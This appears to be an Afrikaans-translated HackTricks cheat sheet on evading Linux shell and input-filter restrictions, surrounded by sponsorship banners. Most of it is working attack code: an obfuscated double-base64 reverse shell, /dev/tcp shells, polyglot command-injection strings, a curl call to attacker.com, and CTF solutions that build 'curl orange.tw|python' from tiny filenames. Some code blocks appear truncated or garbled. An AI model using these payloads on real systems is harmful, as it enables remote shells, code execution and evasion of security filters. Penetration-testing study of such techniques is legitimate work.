# Bypass Linux Beperkings
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! Ander maniere om HackTricks te ondersteun: * As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
\ Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **werkstrome outomatiseer** wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapshulpmiddels.\ Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Algemene Beperkingsontduiking ### Omgekeerde Skulpdoel ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` ### Kort Rev shell ```bash #Trick from Dikline #Get a rev shell with (sh)0>/dev/tcp/10.10.10.10/443 #Then get the out of the rev shell executing inside of it: exec >&0 ``` ### Omgangspaaie en verbode woorde ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost # Wildcard(*) binary substitution /usr/bin/who*mi # /usr/bin/whoami # Wildcard + local directory arguments touch -- -la # -- stops processing options after the -- ls * echo * #List current files and folders with echo and wildcard # [chars] /usr/bin/n[c] # /usr/bin/nc # Quotes 'p'i'n'g # ping "w"h"o"a"m"i # whoami ech''o test # echo test ech""o test # echo test bas''e64 # base64 #Backslashes \u\n\a\m\e \-\a # uname -a /\b\i\n/////s\h # $@ who$@ami #whoami # Transformations (case, reverse, base64) $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case $(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash) $(rev<<<'imaohw') #whoami bash<<<$(base64 -d<< /tmp/[ chmod +x [ export PATH=/tmp:$PATH if [ "a" ]; then echo 1; fi # Will print hello! ``` ### Meertalige bevelinspuiting ```bash 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ ``` ### Oorloop moontlike regexes ```bash # A regex that only allow letters and numbers might be vulnerable to new line characters 1%0a`curl http://attacker.com` ``` ### Bashfuscator ```bash # From https://github.com/Bashfuscator/Bashfuscator ./bashfuscator -c 'cat /etc/passwd' ``` ### RCE met 5 karakters ```bash # From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge #Oragnge Tsai solution ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date http://host/?cmd=>ls\ http://host/?cmd=ls>_ http://host/?cmd=>\ \ http://host/?cmd=>-t\ http://host/?cmd=>\>g http://host/?cmd=ls>>_ ## Step2: generate `curl orange.tw|python` to file "g" ## by creating the necesary filenames and writting that content to file "g" executing the previous generated file http://host/?cmd=>on http://host/?cmd=>th\ http://host/?cmd=>py\ http://host/?cmd=>\|\ http://host/?cmd=>tw\ http://host/?cmd=>e.\ http://host/?cmd=>ng\ http://host/?cmd=>ra\ http://host/?cmd=>o\ http://host/?cmd=>\ \ http://host/?cmd=>rl\ http://host/?cmd=>cu\ http://host/?cmd=sh _ # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file ## Finally execute the file "g" http://host/?cmd=sh g # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ # Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*" https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ ## Execute tar command over a folder http://52.199.204.34/?cmd=>tar http://52.199.204.34/?cmd=>zcf http://52.199.204.34/?cmd=>zzz http://52.199.204.34/?cmd=*%20/h* # Another curiosity if you can read files of the current folder ln /f* ## If there is a file /flag.txt that will create a hard link ## to it in the current folder ``` ### RCE met 4 karakters ```bash # In a similar fashion to the previous bypass this one just need 4 chars to execute commands # it will follow the same principle of creating the command `ls -t>g` in a file # and then generate the full command in filenames # generate "g> ht- sl" to file "v" '>dir' '>sl' '>g\>' '>ht-' '*>v' # reverse file "v" to file "x", content "ls -th >g" '>rev' '*v>x' # generate "curl orange.tw|python;" '>\;\\' '>on\\' '>th\\' '>py\\' '>\|\\' '>tw\\' '>e.\\' '>ng\\' '>ra\\' '>o\\' '>\ \\' '>rl\\' '>cu\\' # got shell 'sh x' 'sh g' ``` ## Lees-Slegs/Noexec/Distroless Omgang Indien jy binne 'n lêersisteem met die **lees-slegs en noexec-beskermings** of selfs in 'n distroless houer is, is daar steeds maniere om **arbitrêre binêre lêers uit te voer, selfs 'n skaal!:** {% content-ref url="../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/" %} [bypass-fs-protections-read-only-no-exec-distroless](../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/) {% endcontent-ref %} ## Chroot & ander Jails Omgang {% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md) {% endcontent-ref %} ## Verwysings & Meer * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) * [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) * [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) * [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
\ Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **outomatiseer werkstrome** aangedryf deur die wêreld se **mees gevorderde** gemeenskapshulpmiddels.\ Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! Ander maniere om HackTricks te ondersteun: * As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.